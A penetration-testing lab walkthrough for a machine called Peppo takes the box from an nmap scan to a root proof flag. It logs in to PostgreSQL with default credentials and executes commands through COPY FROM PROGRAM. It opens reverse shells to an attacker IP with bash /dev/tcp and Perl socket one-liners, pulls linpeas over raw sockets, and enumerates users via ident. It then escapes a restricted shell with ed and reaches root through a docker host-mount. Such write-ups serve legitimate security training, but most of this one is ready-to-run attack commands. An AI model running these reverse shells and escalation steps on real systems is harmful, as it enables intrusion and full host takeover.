Malleum Knowledge Base

Peppo

3 min read

Enumeration

Open Ports

PORT      STATE  SERVICE           REASON         VERSION
22/tcp    open   ssh               syn-ack ttl 61 OpenSSH 7.4p1 Debian 10+deb9u7 (protocol 2.0)
|_auth-owners: root

53/tcp    closed domain            reset ttl 61

113/tcp   open   ident             syn-ack ttl 61 FreeBSD identd
|_auth-owners: nobody

5432/tcp  open   postgresql        syn-ack ttl 60 PostgreSQL DB 12.3 - 12.4

8080/tcp  open   http              syn-ack ttl 60 WEBrick httpd 1.4.2 (Ruby 2.6.6 (2020-03-31))
| http-robots.txt: 4 disallowed entries 
|_/issues/gantt /issues/calendar /activity /search
|_http-title: Redmine
|_http-favicon: Unknown favicon MD5: D316E1622C58825727E7E4E6C954D289
|_http-server-header: WEBrick/1.4.2 (Ruby/2.6.6/2020-03-31)
| http-methods: 
|_  Supported Methods: GET HEAD POST OPTIONS

10000/tcp open   snet-sensor-mgmt? syn-ack ttl 61
|_auth-owners: eleanor

Started with postgres:postfres login first.

Port 5432

psql -h 192.168.230.60 -U postgres

Getting a Shell

# check ls

postgres=# CREATE TABLE ls_output (output text);
CREATE TABLE
postgres=# COPY ls_output FROM PROGRAM 'ls /';
COPY 21
postgres=# SELECT * FROM ls_output;

#check nc

postgres=# CREATE TABLE nc_check (output text);
CREATE TABLE
postgres=# COPY nc_check FROM PROGRAM 'which nc';
ERROR:  program "which nc" failed
DETAIL:  child process exited with exit code 1


# check python

postgres=# CREATE TABLE python_check (output text);
CREATE TABLE
postgres=# COPY python_check FROM PROGRAM 'which python || which python3';
ERROR:  program "which python || which python3" failed
DETAIL:  child process exited with exit code 1


# check bash 

postgres=# CREATE TABLE bash_check (output text);
CREATE TABLE
postgres=# COPY bash_check FROM PROGRAM 'which bash';
COPY 1
postgres=# SELECT * FROM bash_check;
  output   
-----------
 /bin/bash
(1 row)

# check perl

postgres=# CREATE TABLE perl_check (output text);
CREATE TABLE
postgres=# COPY perl_check FROM PROGRAM 'which perl';
COPY 1
postgres=# SELECT * FROM perl_check;
    output     
---------------
 /usr/bin/perl
(1 row)

# check socat

postgres=# CREATE TABLE socat_check (output text);
CREATE TABLE
postgres=# COPY socat_check FROM PROGRAM 'which socat';
ERROR:  program "which socat" failed
DETAIL:  child process exited with exit code 1

# Getting bash shell

postgres=# CREATE TABLE bash_shell (output text);
CREATE TABLE
postgres=# COPY bash_shell FROM PROGRAM $$/bin/bash -c '/bin/bash -i >& /dev/tcp/192.168.45.225/4444 0>&1'$$;


# Getting perl shell

CREATE TABLE perl_shell (output text);
COPY perl_shell FROM PROGRAM $$/usr/bin/perl -e 'use Socket;$i="192.168.45.225";$p=4444;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'$$;

File transferring using bash


exec 5<>/dev/tcp/192.168.45.225/8000
echo -e "GET /lse.sh HTTP/1.1\r\nHost: 192.168.45.225\r\nConnection: close\r\n\r\n" >&5
cat <&5 > lse.sh


exec 5<>/dev/tcp/192.168.45.225/8000
echo -e "GET /linpeas.sh HTTP/1.1\r\nHost: 192.168.45.225\r\nConnection: close\r\n\r\n" >&5
cat <&5 > linpeas.sh

Enumeration

 
[+] System stats
Filesystem      Size  Used Avail Use% Mounted on
overlay         7.9G  2.8G  4.7G  37% /
tmpfs            64M     0   64M   0% /dev
tmpfs          1003M     0 1003M   0% /sys/fs/cgroup
shm              64M  8.0K   64M   1% /dev/shm
/dev/sda1       7.9G  2.8G  4.7G  37% /etc/hosts
tmpfs          1003M     0 1003M   0% /proc/acpi
tmpfs          1003M     0 1003M   0% /sys/firmware
 
 
 
[+] Is this a container? .......... Looks like we're in a Docker container
 
 
 
172.17.0.2	326cfee15738
 
 
[+] Looking for ldap directories and their hashes
/etc/ldap
The password hash is from the {SSHA} to 'structural'
 
[+] Interesting GROUP writable files (not in Home)
[i] https://book.hacktricks.xyz/linux-unix/privilege-escalation#writable-files
  Group postgres:
/run/postgresql
/var/log/postgresql
  Group ssl-cert:

port 113 ident

└─$ ident-user-enum 192.168.230.60 22 8080 5432 10000
ident-user-enum v1.0 ( http://pentestmonkey.net/tools/ident-user-enum )
 
192.168.230.60:22	root
192.168.230.60:8080	<unknown>
192.168.230.60:5432	<unknown>
192.168.230.60:10000	eleanor
 
 
ssh eleanor@192.168.230.60
 
ls bin
 
ed
!/bin/sh
 
eleanor@peppo:~$ docker images
REPOSITORY          TAG                 IMAGE ID            CREATED             SIZE
redmine             latest              0c8429c66e07        3 years ago         542MB
postgres            latest              adf2b126dda8        3 years ago         313MB
eleanor@peppo:~$ docker run -it -v /:/host/ redmine chroot /host/ bash
root@a92445f5fa28:/# ls
bin   etc	  initrd.img.old  lost+found  opt   run   sys  var
boot  home	  lib		  media       proc  sbin  tmp  vmlinuz
dev   initrd.img  lib64		  mnt	      root  srv   usr  vmlinuz.old
root@a92445f5fa28:/# cd /root
root@a92445f5fa28:/root# ls
proof.txt
root@a92445f5fa28:/root# cat proof.txt
a9110796661bcfb6a2cd7a3a33575054

Graph View